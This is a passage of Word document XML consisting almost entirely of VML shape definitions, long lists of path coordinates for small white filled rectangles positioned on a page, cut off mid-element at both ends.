5817,2095,5817,2095,5817,2095,5817,2095,5817,2095,5817,2095,5817,2095,5817,2095,5817,2095,5817,2095,5816,2095,5816,2095,5816,2095,5816,2095,5816,2095,5816,2095,5816,2095,5815,2095,5815,2095,5815,2095,5815,2095,5814,2095,5814,2095,5814,2095,5813,2095,5813,2095,5812,2095,5812,2095,5811,2095,5811,2095,5810,2095,5810,2095,5809,2095,5809,2095,5808,2095,5807,2095,5806,2095,5806,2095,5805,2095,5804,2095,5803,2095,5802,2095,5801,2095,5800,2095,5799,2095,5798,2095,5797,2095,5796,2095,5794,2095,5793,2095,5792,2095,5790,2095,5789,2095,5787,2095,5786,2095,5784,2095,5783,2095,5781,2095,5779,2095,5777,2095,5775,2095,5773,2095,5771,2095,5769,2095,5767,2095,5765,2095,5763,2095,5760,2095,5758,2095,5756,2095,5753,2095,5750,2095,5748,2095,5745,2095,5742,2095,5739,2095,5736,2095,5733,2095,5730,2095,5727,2095,5724,2095,5721,2095,5717,2095,5714,2095,5710,2095,5707,2095,5703,2095,5699,2095,5695,2095,5691,2095,5687,2095,5683,2095,5679,2095,5674,2095,5670,2095,5666,2095,5661,2095,5656,2095,5651,2095,5647,2095,5642,2095,5637,2095,5631,2095,5626,2095,5621,2095,5615,2095,5610,2095,5604,2095,5598,2095,5593,2095,5587,2095,5581,2095,5574,2095,5568,2095,5562e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:103.500pt;margin-top:295.500pt;width:6.500pt;height:12.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2070,5910" coordsize="130,250">
        <v:shape style="position:absolute;left:2070;top:5910;width:130;height:250" coordorigin="2070,5910" coordsize="130,250" path="m2095,5922l2095,5922,2095,5922,2095,5922,2095,5922,2095,5922,2095,5922,2095,5922,2095,5922,2095,5922,2095,5922,2095,5922,2095,5922,2095,5922,2095,5922,2095,5922,2095,5922,2095,5922,2095,5922,2095,5922,2096,5922,2096,5922,2096,5922,2096,5922,2096,5922,2096,5922,2096,5922,2096,5922,2096,5922,2097,5922,2097,5922,2097,5922,2097,5922,2097,5922,2098,5922,2098,5922,2098,5922,2098,5922,2099,5922,2099,5922,2099,5922,2100,5922,2100,5922,2100,5922,2101,5922,2101,5922,2102,5922,2102,5922,2102,5922,2103,5922,2103,5922,2104,5922,2105,5922,2105,5922,2106,5922,2106,5922,2107,5922,2108,5922,2108,5922,2109,5922,2110,5922,2110,5922,2111,5922,2112,5922,2113,5922,2114,5922,2115,5922,2116,5922,2116,5922,2117,5922,2118,5922,2119,5922,2121,5922,2122,5922,2123,5922,2124,5922,2125,5922,2126,5922,2128,5922,2129,5922,2130,5922,2132,5922,2133,5922,2134,5922,2136,5922,2137,5922,2139,5922,2140,5922,2142,5922,2144,5922,2145,5922,2147,5922,2149,5922,2151,5922,2152,5922,2154,5922,2156,5922,2158,5922,2160,5922,2162,5922,2164,5922,2166,5922,2168,5922,2171,5922,2173,5922,2175,5922,2178,5922,2180,5922,2182,5922,2185,5922,2187,5922,2190,5922,2192,5922,2195,5922,2198,5922,2201,5922,2203,5922,2206,5922,2209,5922,2212,5922,2215,5922,2215,5922,2215,5922,2215,5922,2215,5922,2215,5922,2215,5922,2215,5922,2215,5922,2215,5922,2215,5922,2215,5922,2215,5922,2215,5922,2215,5922,2215,5922,2215,5922,2215,5923,2215,5923,2215,5923,2215,5923,2215,5923,2215,5923,2215,5924,2215,5924,2215,5924,2215,5924,2215,5925,2215,5925,2215,5925,2215,5926,2215,5926,2215,5926,2215,5927,2215,5927,2215,5928,2215,5928,2215,5929,2215,5930,2215,5930,2215,5931,2215,5932,2215,5932,2215,5933,2215,5934,2215,5935,2215,5936,2215,5937,2215,5938,2215,5939,2215,5940,2215,5941,2215,5942,2215,5943,2215,5945,2215,5946,2215,5947,2215,5949,2215,5950,2215,5952,2215,5953,2215,5955,2215,5956,2215,5958,2215,5960,2215,5962,2215,5964,2215,5966,2215,5968,2215,5970,2215,5972,2215,5974,2215,5976,2215,5978,2215,5981,2215,5983,2215,5986,2215,5988,2215,5991,2215,5994,2215,5997,2215,5999,2215,6002,2215,6005,2215,6009,2215,6012,2215,6015,2215,6018,2215,6022,2215,6025,2215,6029,2215,6032,2215,6036,2215,6040,2215,6044,2215,6048,2215,6052,2215,6056,2215,6060,2215,6064,2215,6069,2215,6073,2215,6078,2215,6083,2215,6087,2215,6092,2215,6097,2215,6102,2215,6107,2215,6113,2215,6118,2215,6123,2215,6129,2215,6135,2215,6140,2215,6146,2215,6152,2215,6158,2215,6164,2215,6171,2215,6177,2215,6177,2215,6177,2215,6177,2215,6177,2215,6177,2215,6177,2215,6177,2215,6177,2215,6177,2215,6177,2215,6177,2215,6177,2215,6177,2215,6177,2215,6177,2215,6177,2215,6177,2215,6177,2215,6177,2215,6177,2215,6177,2214,6177,2214,6177,2214,6177,2214,6177,2214,6177,2214,6177,2214,6177,2214,6177,2213,6177,2213,6177,2213,6177,2213,6177,2213,6177,2212,6177,2212,6177,2212,6177,2212,6177,2211,6177,2211,6177,2211,6177,2210,6177,2210,6177,2209,6177,2209,6177,2209,6177,2208,6177,2208,6177,2207,6177,2207,6177,2206,6177,2206,6177,2205,6177,2205,6177,2204,6177,2203,6177,2203,6177,2202,6177,2201,6177,2200,6177,2200,6177,2199,6177,2198,6177,2197,6177,2196,6177,2196,6177,2195,6177,2194,6177,2193,6177,2192,6177,2191,6177,2190,6177,2189,6177,2187,6177,2186,6177,2185,6177,2184,6177,2183,6177,2181,6177,2180,6177,2179,6177,2177,6177,2176,6177,2174,6177,2173,6177,2171,6177,2170,6177,2168,6177,2167,6177,2165,6177,2163,6177,2161,6177,2160,6177,2158,6177,2156,6177,2154,6177,2152,6177,2150,6177,2148,6177,2146,6177,2144,6177,2142,6177,2140,6177,2137,6177,2135,6177,2133,6177,2130,6177,2128,6177,2125,6177,2123,6177,2120,6177,2118,6177,2115,6177,2112,6177,2110,6177,2107,6177,2104,6177,2101,6177,2098,6177,2095,6177,2095,6177,2095,6177,2095,6177,2095,6177,2095,6177,2095,6177,2095,6177,2095,6177,2095,6177,2095,6177,2095,6177,2095,6177,2095,6177,2095,6177,2095,6177,2095,6177,2095,6176,2095,6176,2095,6176,2095,6176,2095,6176,2095,6176,2095,6175,2095,6175,2095,6175,2095,6175,2095,6174,2095,6174,2095,6174,2095,6173,2095,6173,2095,6173,2095,6172,2095,6172,2095,6171,2095,6171,2095,6170,2095,6169,2095,6169,2095,6168,2095,6167,2095,6167,2095,6166,2095,6165,2095,6164,2095,6163,2095,6162,2095,6161,2095,6160,2095,6159,2095,6158,2095,6157,2095,6156,2095,6155,2095,6153,2095,6152,2095,6151,2095,6149,2095,6148,2095,6146,2095,6144,2095,6143,2095,6141,2095,6139,2095,6137,2095,6136,2095,6134,2095,6132,2095,6130,2095,6127,2095,6125,2095,6123,2095,6121,2095,6118,2095,6116,2095,6113,2095,6111,2095,6108,2095,6105,2095,6102,2095,6100,2095,6097,2095,6094,2095,6091,2095,6087,2095,6084,2095,6081,2095,6077,2095,6074,2095,6070,2095,6067,2095,6063,2095,6059,2095,6055,2095,6051,2095,6047,2095,6043,2095,6039,2095,6035,2095,6030,2095,6026,2095,6021,2095,6016,2095,6012,2095,6007,2095,6002,2095,5997,2095,5992,2095,5986,2095,5981,2095,5976,2095,5970,2095,5964,2095,5959,2095,5953,2095,5947,2095,5941,2095,5935,2095,5928,2095,5922e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:103.500pt;margin-top:313.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2070,6270" coordsize="130,270">
        <v:shape style="position:absolute;left:2070;top:6270;width:130;height:270" coordorigin="2070,6270" coordsize="130,270" path="m2095,6297l2095,6297,2095,6297,2095,6297,2095,6297,2095,6297,2095,6297,2095,6297,2095,6297,2095,6297,2095,6297,2095,6297,2095,6297,2095,6297,2095,6297,2095,6297,2095,6297,2095,6297,2095,6297,2095,6297,2096,6297,2096,6297,2096,6297,2096,6297,2096,6297,2096,6297,2096,6297,2096,6297,2096,6297,2097,6297,2097,6297,2097,6297,2097,6297,2097,6297,2098,6297,2098,6297,2098,6297,2098,6297,2099,6297,2099,6297,2099,6297,2100,6297,2100,6297,2100,6297,2101,6297,2101,6297,2102,6297,2102,6297,2102,6297,2103,6297,2103,6297,2104,6297,2105,6297,2105,6297,2106,6297,2106,6297,2107,6297,2108,6297,2108,6297,2109,6297,2110,6297,2110,6297,2111,6297,2112,6297,2113,6297,2114,6297,2115,6297,2116,6297,2116,6297,2117,6297,2118,6297,2119,6297,2121,6297,2122,6297,2123,6297,2124,6297,2125,6297,2126,6297,2128,6297,2129,6297,2130,6297,2132,6297,2133,6297,2134,6297,2136,6297,2137,6297,2139,6297,2140,6297,2142,6297,2144,6297,2145,6297,2147,6297,2149,6297,2151,6297,2152,6297,2154,6297,2156,6297,2158,6297,2160,6297,2162,6297,2164,6297,2166,6297,2168,6297,2171,6297,2173,6297,2175,6297,2178,6297,2180,6297,2182,6297,2185,6297,2187,6297,2190,6297,2192,6297,2195,6297,2198,6297,2201,6297,2203,6297,2206,6297,2209,6297,2212,6297,2215,6297,2215,6297,2215,6297,2215,6297,2215,6297,2215,6297,2215,6297,2215,6297,2215,6297,2215,6297,2215,6297,2215,6297,2215,6297,2215,6297,2215,6298,2215,6298,2215,6298,2215,6298,2215,6298,2215,6298,2215,6298,2215,6298,2215,6299,2215,6299,2215,6299,2215,6299,2215,6300,2215,6300,2215,6300,2215,6300,2215,6301,2215,6301,2215,6302,2215,6302,2215,6303,2215,6303,2215,6304,2215,6304,2215,6305,2215,6305,2215,6306,2215,6307,2215,6308,2215,6308,2215,6309,2215,6310,2215,6311,2215,6312,2215,6313,2215,6314,2215,6315,2215,6316,2215,6317,2215,6318,2215,6320,2215,6321,2215,6322,2215,6324,2215,6325,2215,6327,2215,6328,2215,6330,2215,6332,2215,6333,2215,6335,2215,6337,2215,6339,2215,6341,2215,6343,2215,6345,2215,6347,2215,6349,2215,6351,2215,6354,2215,6356,2215,6359,2215,6361,2215,6364,2215,6366,2215,6369,2215,6372,2215,6375,2215,6378,2215,6381,2215,6384,2215,6387,2215,6390,2215,6393,2215,6397,2215,6400,2215,6404,2215,6408,2215,6411,2215,6415,2215,6419,2215,6423,2215,6427,2215,6431,2215,6435,2215,6440,2215,6444,2215,6449,2215,6453,2215,6458,2215,6463,2215,6467,2215,6472,2215,6477,2215,6483,2215,6488,2215,6493,2215,6499,2215,6504,2215,6510,2215,6516,2215,6521,2215,6527,2215,6533,2215,6540,2215,6546,2215,6552,2215,6552,2215,6552,2215,6552,2215,6552,2215,6552,2215,6552,2215,6552,2215,6552,2215,6552,2215,6552,2215,6552,2215,6552,2215,6552,2215,6552,2215,6552,2215,6552,2215,6552,2215,6552,2215,6552,2215,6552,2215,6552,2214,6552,2214,6552,2214,6552,2214,6552,2214,6552,2214,6552,2214,6552,2214,6552,2213,6552,2213,6552,2213,6552,2213,6552,2213,6552,2212,6552,2212,6552,2212,6552,2212,6552,2211,6552,2211,6552,2211,6552,2210,6552,2210,6552,2209,6552,2209,6552,2209,6552,2208,6552,2208,6552,2207,6552,2207,6552,2206,6552,2206,6552,2205,6552,2205,6552,2204,6552,2203,6552,2203,6552,2202,6552,2201,6552,2200,6552,2200,6552,2199,6552,2198,6552,2197,6552,2196,6552,2196,6552,2195,6552,2194,6552,2193,6552,2192,6552,2191,6552,2190,6552,2189,6552,2187,6552,2186,6552,2185,6552,2184,6552,2183,6552,2181,6552,2180,6552,2179,6552,2177,6552,2176,6552,2174,6552,2173,6552,2171,6552,2170,6552,2168,6552,2167,6552,2165,6552,2163,6552,2161,6552,2160,6552,2158,6552,2156,6552,2154,6552,2152,6552,2150,6552,2148,6552,2146,6552,2144,6552,2142,6552,2140,6552,2137,6552,2135,6552,2133,6552,2130,6552,2128,6552,2125,6552,2123,6552,2120,6552,2118,6552,2115,6552,2112,6552,2110,6552,2107,6552,2104,6552,2101,6552,2098,6552,2095,6552,2095,6552,2095,6552,2095,6552,2095,6552,2095,6552,2095,6552,2095,6552,2095,6552,2095,6552,2095,6552,2095,6552,2095,6552,2095,6552,2095,6552,2095,6552,2095,6552,2095,6552,2095,6552,2095,6551,2095,6551,2095,6551,2095,6551,2095,6551,2095,6550,2095,6550,2095,6550,2095,6550,2095,6549,2095,6549,2095,6549,2095,6548,2095,6548,2095,6547,2095,6547,2095,6546,2095,6546,2095,6545,2095,6545,2095,6544,2095,6543,2095,6543,2095,6542,2095,6541,2095,6540,2095,6539,2095,6539,2095,6538,2095,6537,2095,6536,2095,6534,2095,6533,2095,6532,2095,6531,2095,6530,2095,6528,2095,6527,2095,6526,2095,6524,2095,6523,2095,6521,2095,6520,2095,6518,2095,6516,2095,6514,2095,6513,2095,6511,2095,6509,2095,6507,2095,6505,2095,6503,2095,6500,2095,6498,2095,6496,2095,6493,2095,6491,2095,6488,2095,6486,2095,6483,2095,6480,2095,6478,2095,6475,2095,6472,2095,6469,2095,6466,2095,6463,2095,6459,2095,6456,2095,6453,2095,6449,2095,6446,2095,6442,2095,6438,2095,6434,2095,6431,2095,6427,2095,6422,2095,6418,2095,6414,2095,6410,2095,6405,2095,6401,2095,6396,2095,6392,2095,6387,2095,6382,2095,6377,2095,6372,2095,6367,2095,6362,2095,6356,2095,6351,2095,6345,2095,6340,2095,6334,2095,6328,2095,6322,2095,6316,2095,6310,2095,6304,2095,6297e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:391.500pt;margin-top:313.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="7830,6270" coordsize="130,270">
        <v:shape style="position:absolute;left:7830;top:6270;width:130;height:270" coordorigin="7830,6270" coordsize="130,270" path="m7858,6297l7858,6297,7858,6297,7858,6297,7858,6297,7858,6297,7858,6297,7858,6297,7858,6297,7858,6297,7858,6297,7858,6297,7858,6297,7858,6297,7858,6297,7858,6297,7858,6297,7858,6297,7858,6297,7858,6297,7858,6297,7859,6297,7859,6297,7859,6297,7859,6297,7859,6297,7859,6297,7859,6297,7859,6297,7860,6297,7860,6297,7860,6297,7860,6297,7860,6297,7861,6297,7861,6297,7861,6297,7861,6297,7862,6297,7862,6297,7862,6297,7863,6297,7863,6297,7863,6297,7864,6297,7864,6297,7864,6297,7865,6297,7865,6297,7866,6297,7866,6297,7867,6297,7867,6297,7868,6297,7869,6297,7869,6297,7870,6297,7870,6297,7871,6297,7872,6297,7873,6297,7873,6297,7874,6297,7875,6297,7876,6297,7877,6297,7878,6297,7878,6297,7879,6297,7880,6297,7881,6297,7882,6297,7883,6297,7885,6297,7886,6297,7887,6297,7888,6297,7889,6297,7890,6297,7892,6297,7893,6297,7894,6297,7896,6297,7897,6297,7899,6297,7900,6297,7902,6297,7903,6297,7905,6297,7907,6297,7908,6297,7910,6297,7912,6297,7913,6297,7915,6297,7917,6297,7919,6297,7921,6297,7923,6297,7925,6297,7927,6297,7929,6297,7931,6297,7934,6297,7936,6297,7938,6297,7940,6297,7943,6297,7945,6297,7948,6297,7950,6297,7953,6297,7955,6297,7958,6297,7961,6297,7964,6297,7966,6297,7969,6297,7972,6297,7975,6297,7978,6297,7978,6297,7978,6297,7978,6297,7978,6297,7978,6297,7978,6297,7978,6297,7978,6297,7978,6297,7978,6297,7978,6297,7978,6297,7978,6297,7978,6298,7978,6298,7978,6298,7978,6298,7978,6298,7978,6298,7978,6298,7978,6298,7978,6299,7978,6299,7978,6299,7978,6299,7978,6300,7978,6300,7978,6300,7978,6300,7978,6301,7978,6301,7978,6302,7978,6302,7978,6303,7978,6303,7978,6304,7978,6304,7978,6305,7978,6305,7978,6306,7978,6307,7978,6308,7978,6308,7978,6309,7978,6310,7978,6311,7978,6312,7978,6313,7978,6314,7978,6315,7978,6316,7978,6317,7978,6318,7978,6320,7978,6321,7978,6322,7978,6324,7978,6325,7978,6327,7978,6328,7978,6330,7978,6332,7978,6333,7978,6335,7978,6337,7978,6339,7978,6341,7978,6343,7978,6345,7978,6347,7978,6349,7978,6351,7978,6354,7978,6356,7978,6359,7978,6361,7978,6364,7978,6366,7978,6369,7978,6372,7978,6375,7978,6378,7978,6381,7978,6384,7978,6387,7978,6390,7978,6393,7978,6397,7978,6400,7978,6404,7978,6408,7978,6411,7978,6415,7978,6419,7978,6423,7978,6427,7978,6431,7978,6435,7978,6440,7978,6444,7978,6449,7978,6453,7978,6458,7978,6463,7978,6467,7978,6472,7978,6477,7978,6483,7978,6488,7978,6493,7978,6499,7978,6504,7978,6510,7978,6516,7978,6521,7978,6527,7978,6533,7978,6540,7978,6546,7978,6552,7978,6552,7978,6552,7978,6552,7978,6552,7978,6552,7978,6552,7978,6552,7978,6552,7978,6552,7978,6552,7978,6552,7978,6552,7978,6552,7978,6552,7978,6552,7978,6552,7978,6552,7978,6552,7978,6552,7978,6552,7977,6552,7977,6552,7977,6552,7977,6552,7977,6552,7977,6552,7977,6552,7977,6552,7976,6552,7976,6552,7976,6552,7976,6552,7976,6552,7975,6552,7975,6552,7975,6552,7975,6552,7974,6552,7974,6552,7974,6552,7973,6552,7973,6552,7973,6552,7972,6552,7972,6552,7972,6552,7971,6552,7971,6552,7970,6552,7970,6552,7969,6552,7969,6552,7968,6552,7967,6552,7967,6552,7966,6552,7966,6552,7965,6552,7964,6552,7963,6552,7963,6552,7962,6552,7961,6552,7960,6552,7959,6552,7958,6552,7958,6552,7957,6552,7956,6552,7955,6552,7954,6552,7953,6552,7951,6552,7950,6552,7949,6552,7948,6552,7947,6552,7945,6552,7944,6552,7943,6552,7942,6552,7940,6552,7939,6552,7937,6552,7936,6552,7934,6552,7933,6552,7931,6552,7929,6552,7928,6552,7926,6552,7924,6552,7923,6552,7921,6552,7919,6552,7917,6552,7915,6552,7913,6552,7911,6552,7909,6552,7907,6552,7905,6552,7902,6552,7900,6552,7898,6552,7896,6552,7893,6552,7891,6552,7888,6552,7886,6552,7883,6552,7881,6552,7878,6552,7875,6552,7872,6552,7870,6552,7867,6552,7864,6552,7861,6552,7858,6552,7858,6552,7858,6552,7858,6552,7858,6552,7858,6552,7858,6552,7858,6552,7858,6552,7858,6552,7858,6552,7858,6552,7858,6552,7858,6552,7858,6552,7858,6552,7858,6552,7858,6552,7858,6552,7858,6551,7858,6551,7858,6551,7858,6551,7858,6551,7858,6550,7858,6550,7858,6550,7858,6550,7858,6549,7858,6549,7858,6549,7858,6548,7858,6548,7858,6547,7858,6547,7858,6546,7858,6546,7858,6545,7858,6545,7858,6544,7858,6543,7858,6543,7858,6542,7858,6541,7858,6540,7858,6539,7858,6539,7858,6538,7858,6537,7858,6536,7858,6534,7858,6533,7858,6532,7858,6531,7858,6530,7858,6528,7858,6527,7858,6526,7858,6524,7858,6523,7858,6521,7858,6520,7858,6518,7858,6516,7858,6514,7858,6513,7858,6511,7858,6509,7858,6507,7858,6505,7858,6503,7858,6500,7858,6498,7858,6496,7858,6493,7858,6491,7858,6488,7858,6486,7858,6483,7858,6480,7858,6478,7858,6475,7858,6472,7858,6469,7858,6466,7858,6463,7858,6459,7858,6456,7858,6453,7858,6449,7858,6446,7858,6442,7858,6438,7858,6434,7858,6431,7858,6427,7858,6422,7858,6418,7858,6414,7858,6410,7858,6405,7858,6401,7858,6396,7858,6392,7858,6387,7858,6382,7858,6377,7858,6372,7858,6367,7858,6362,7858,6356,7858,6351,7858,6345,7858,6340,7858,6334,7858,6328,7858,6322,7858,6316,7858,6310,7858,6304,7858,6297e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:397.500pt;margin-top:313.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="7950,6270" coordsize="130,270">
        <v:shape style="position:absolute;left:7950;top:6270;width:130;height:270" coordorigin="7950,6270" coordsize="130,270" path="m7978,6297l7978,6297,7978,6297,7978,6297,7978,6297,7978,6297,7978,6297,7978,6297,7978,6297,7978,6297,7978,6297,7978,6297,7978,6297,7978,6297,7978,6297,7978,6297,7978,6297,7978,6297,7978,6297,7978,6297,7979,6297,7979,6297,7979,6297,7979,6297,7979,6297,7979,6297,7979,6297,7979,6297,7979,6297,7980,6297,7980,6297,7980,6297,7980,6297,7980,6297,7981,6297,7981,6297,7981,6297,7981,6297,7982,6297,7982,6297,7982,6297,7983,6297,7983,6297,7983,6297,7984,6297,7984,6297,7985,6297,7985,6297,7985,6297,7986,6297,7986,6297,7987,6297,7987,6297,7988,6297,7989,6297,7989,6297,7990,6297,7991,6297,7991,6297,7992,6297,7993,6297,7993,6297,7994,6297,7995,6297,7996,6297,7997,6297,7998,6297,7999,6297,7999,6297,8000,6297,8001,6297,8002,6297,8004,6297,8005,6297,8006,6297,8007,6297,8008,6297,8009,6297,8011,6297,8012,6297,8013,6297,8014,6297,8016,6297,8017,6297,8019,6297,8020,6297,8022,6297,8023,6297,8025,6297,8027,6297,8028,6297,8030,6297,8032,6297,8033,6297,8035,6297,8037,6297,8039,6297,8041,6297,8043,6297,8045,6297,8047,6297,8049,6297,8051,6297,8054,6297,8056,6297,8058,6297,8060,6297,8063,6297,8065,6297,8068,6297,8070,6297,8073,6297,8075,6297,8078,6297,8081,6297,8084,6297,8086,6297,8089,6297,8092,6297,8095,6297,8098,6297,8098,6297,8098,6297,8098,6297,8098,6297,8098,6297,8098,6297,8098,6297,8098,6297,8098,6297,8098,6297,8098,6297,8098,6297,8098,6297,8098,6298,8098,6298,8098,6298,8098,6298,8098,6298,8098,6298,8098,6298,8098,6298,8098,6299,8098,6299,8098,6299,8098,6299,8098,6300,8098,6300,8098,6300,8098,6300,8098,6301,8098,6301,8098,6302,8098,6302,8098,6303,8098,6303,8098,6304,8098,6304,8098,6305,8098,6305,8098,6306,8098,6307,8098,6308,8098,6308,8098,6309,8098,6310,8098,6311,8098,6312,8098,6313,8098,6314,8098,6315,8098,6316,8098,6317,8098,6318,8098,6320,8098,6321,8098,6322,8098,6324,8098,6325,8098,6327,8098,6328,8098,6330,8098,6332,8098,6333,8098,6335,8098,6337,8098,6339,8098,6341,8098,6343,8098,6345,8098,6347,8098,6349,8098,6351,8098,6354,8098,6356,8098,6359,8098,6361,8098,6364,8098,6366,8098,6369,8098,6372,8098,6375,8098,6378,8098,6381,8098,6384,8098,6387,8098,6390,8098,6393,8098,6397,8098,6400,8098,6404,8098,6408,8098,6411,8098,6415,8098,6419,8098,6423,8098,6427,8098,6431,8098,6435,8098,6440,8098,6444,8098,6449,8098,6453,8098,6458,8098,6463,8098,6467,8098,6472,8098,6477,8098,6483,8098,6488,8098,6493,8098,6499,8098,6504,8098,6510,8098,6516,8098,6521,8098,6527,8098,6533,8098,6540,8098,6546,8098,6552,8098,6552,8098,6552,8098,6552,8098,6552,8098,6552,8098,6552,8098,6552,8098,6552,8098,6552,8098,6552,8098,6552,8098,6552,8098,6552,8098,6552,8098,6552,8098,6552,8098,6552,8098,6552,8098,6552,8098,6552,8098,6552,8097,6552,8097,6552,8097,6552,8097,6552,8097,6552,8097,6552,8097,6552,8097,6552,8096,6552,8096,6552,8096,6552,8096,6552,8096,6552,8095,6552,8095,6552,8095,6552,8094,6552,8094,6552,8094,6552,8094,6552,8093,6552,8093,6552,8092,6552,8092,6552,8092,6552,8091,6552,8091,6552,8090,6552,8090,6552,8089,6552,8089,6552,8088,6552,8087,6552,8087,6552,8086,6552,8086,6552,8085,6552,8084,6552,8083,6552,8083,6552,8082,6552,8081,6552,8080,6552,8079,6552,8079,6552,8078,6552,8077,6552,8076,6552,8075,6552,8074,6552,8073,6552,8071,6552,8070,6552,8069,6552,8068,6552,8067,6552,8066,6552,8064,6552,8063,6552,8062,6552,8060,6552,8059,6552,8057,6552,8056,6552,8054,6552,8053,6552,8051,6552,8050,6552,8048,6552,8046,6552,8044,6552,8043,6552,8041,6552,8039,6552,8037,6552,8035,6552,8033,6552,8031,6552,8029,6552,8027,6552,8025,6552,8022,6552,8020,6552,8018,6552,8016,6552,8013,6552,8011,6552,8008,6552,8006,6552,8003,6552,8001,6552,7998,6552,7995,6552,7993,6552,7990,6552,7987,6552,7984,6552,7981,6552,7978,6552,7978,6552,7978,6552,7978,6552,7978,6552,7978,6552,7978,6552,7978,6552,7978,6552,7978,6552,7978,6552,7978,6552,7978,6552,7978,6552,7978,6552,7978,6552,7978,6552,7978,6552,7978,6552,7978,6551,7978,6551,7978,6551,7978,6551,7978,6551,7978,6550,7978,6550,7978,6550,7978,6550,7978,6549,7978,6549,7978,6549,7978,6548,7978,6548,7978,6547,7978,6547,7978,6546,7978,6546,7978,6545,7978,6545,7978,6544,7978,6543,7978,6543,7978,6542,7978,6541,7978,6540,7978,6539,7978,6539,7978,6538,7978,6537,7978,6536,7978,6534,7978,6533,7978,6532,7978,6531,7978,6530,7978,6528,7978,6527,7978,6526,7978,6524,7978,6523,7978,6521,7978,6520,7978,6518,7978,6516,7978,6514,7978,6513,7978,6511,7978,6509,7978,6507,7978,6505,7978,6503,7978,6500,7978,6498,7978,6496,7978,6493,7978,6491,7978,6488,7978,6486,7978,6483,7978,6480,7978,6478,7978,6475,7978,6472,7978,6469,7978,6466,7978,6463,7978,6459,7978,6456,7978,6453,7978,6449,7978,6446,7978,6442,7978,6438,7978,6434,7978,6431,7978,6427,7978,6422,7978,6418,7978,6414,7978,6410,7978,6405,7978,6401,7978,6396,7978,6392,7978,6387,7978,6382,7978,6377,7978,6372,7978,6367,7978,6362,7978,6356,7978,6351,7978,6345,7978,6340,7978,6334,7978,6328,7978,6322,7978,6316,7978,6310,7978,6304,7978,6297e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:127.500pt;margin-top:327.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2550,6550" coordsize="130,270">
        <v:shape style="position:absolute;left:2550;top:6550;width:130;height:270" coordorigin="2550,6550" coordsize="130,270" path="m2560,6567l2560,6567,2560,6567,2560,6567,2560,6567,2560,6567,2560,6567,2560,6567,2560,6567,2560,6567,2560,6567,2560,6567,2560,6567,2560,6567,2560,6567,2560,6567,2561,6567,2561,6567,2561,6567,2561,6567,2561,6567,2561,6567,2561,6567,2561,6567,2561,6567,2561,6567,2561,6567,2562,6567,2562,6567,2562,6567,2562,6567,2562,6567,2562,6567,2563,6567,2563,6567,2563,6567,2563,6567,2564,6567,2564,6567,2564,6567,2565,6567,2565,6567,2565,6567,2566,6567,2566,6567,2566,6567,2567,6567,2567,6567,2568,6567,2568,6567,2569,6567,2569,6567,2570,6567,2570,6567,2571,6567,2572,6567,2572,6567,2573,6567,2573,6567,2574,6567,2575,6567,2576,6567,2576,6567,2577,6567,2578,6567,2579,6567,2580,6567,2581,6567,2582,6567,2583,6567,2584,6567,2585,6567,2586,6567,2587,6567,2588,6567,2589,6567,2590,6567,2592,6567,2593,6567,2594,6567,2595,6567,2597,6567,2598,6567,2600,6567,2601,6567,2603,6567,2604,6567,2606,6567,2607,6567,2609,6567,2611,6567,2612,6567,2614,6567,2616,6567,2618,6567,2619,6567,2621,6567,2623,6567,2625,6567,2627,6567,2629,6567,2632,6567,2634,6567,2636,6567,2638,6567,2640,6567,2643,6567,2645,6567,2648,6567,2650,6567,2653,6567,2655,6567,2658,6567,2660,6567,2663,6567,2666,6567,2669,6567,2671,6567,2674,6567,2677,6567,2680,6567,2680,6567,2680,6567,2680,6567,2680,6567,2680,6567,2680,6567,2680,6567,2680,6567,2680,6567,2680,6567,2680,6567,2680,6568,2680,6568,2680,6568,2680,6568,2680,6568,2680,6568,2680,6568,2680,6568,2680,6568,2680,6569,2680,6569,2680,6569,2680,6569,2680,6569,2680,6570,2680,6570,2680,6570,2680,6571,2680,6571,2680,6571,2680,6572,2680,6572,2680,6573,2680,6573,2680,6574,2680,6574,2680,6575,2680,6576,2680,6576,2680,6577,2680,6578,2680,6579,2680,6579,2680,6580,2680,6581,2680,6582,2680,6583,2680,6584,2680,6585,2680,6586,2680,6587,2680,6589,2680,6590,2680,6591,2680,6592,2680,6594,2680,6595,2680,6597,2680,6598,2680,6600,2680,6602,2680,6603,2680,6605,2680,6607,2680,6609,2680,6611,2680,6613,2680,6615,2680,6617,2680,6619,2680,6621,2680,6624,2680,6626,2680,6629,2680,6631,2680,6634,2680,6636,2680,6639,2680,6642,2680,6645,2680,6648,2680,6651,2680,6654,2680,6657,2680,6660,2680,6664,2680,6667,2680,6670,2680,6674,2680,6678,2680,6681,2680,6685,2680,6689,2680,6693,2680,6697,2680,6701,2680,6705,2680,6710,2680,6714,2680,6719,2680,6723,2680,6728,2680,6733,2680,6738,2680,6743,2680,6748,2680,6753,2680,6758,2680,6763,2680,6769,2680,6774,2680,6780,2680,6786,2680,6792,2680,6798,2680,6804,2680,6810,2680,6816,2680,6822,2680,6822,2680,6822,2680,6822,2680,6822,2680,6822,2680,6822,2680,6822,2680,6822,2680,6822,2680,6822,2680,6822,2680,6822,2680,6822,2680,6822,2680,6822,2680,6822,2680,6822,2680,6822,2680,6822,2680,6822,2680,6822,2680,6822,2680,6822,2679,6822,2679,6822,2679,6822,2679,6822,2